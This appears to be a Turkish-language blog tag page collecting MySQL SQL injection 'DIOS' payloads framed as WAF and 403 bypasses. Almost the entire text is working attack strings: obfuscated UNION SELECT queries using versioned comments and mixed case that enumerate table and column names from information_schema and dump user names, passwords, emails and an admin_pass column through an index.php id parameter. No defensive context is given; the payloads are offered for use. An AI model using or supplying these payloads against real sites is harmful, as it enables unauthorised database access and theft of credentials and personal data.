İçeriğe geç

Etiket: sql injection waf bypass

Mysql Sql İnjection DİOS BY ZEN WAF BYPASS

TABLO ADI VE KOLON ADI BİLGİLERİNİ ÇIKARIR Kod: (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(/*!50000iNfoRMaTioN_ScHeMa.coLumNs*/)wHeRe(TaBLe_ScHeMa!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,TaBLe_NaMe,0x203a3a20,CoLumN_NaMe))))x) KOLONDAKİ BİLGİLERİ ÇEKMEK Kod: (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(kolon ismi)wHeRe(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,kulladi,0x203a3a20,kullsif,0x203a3a20,email))))x)

403 Forbidden DİOS WAF BYPASS

403 Forbidden Access to this resource on the server is denied! DİOS WAF TABLO İSİMLERİNİ ÇEKMEK İÇİN  PHP Kod: index.php?id=35′ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c​62723e,/*!50000table_name*/)),@))+,2,3,4– –  DİOS WAF KOLON İSİMLERİ ÇEKMEK İÇİN PHP Kod: index.php?id=35’ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.columns*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c​62723e,/*!50000column_name*/)),@))+,2,3,4– –    Toplu çekilemeyen error veren kolon içerikleri  PHP Kod: index.php?id=35’ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(admin_pass)+,2222,3333,4444+from+admin– –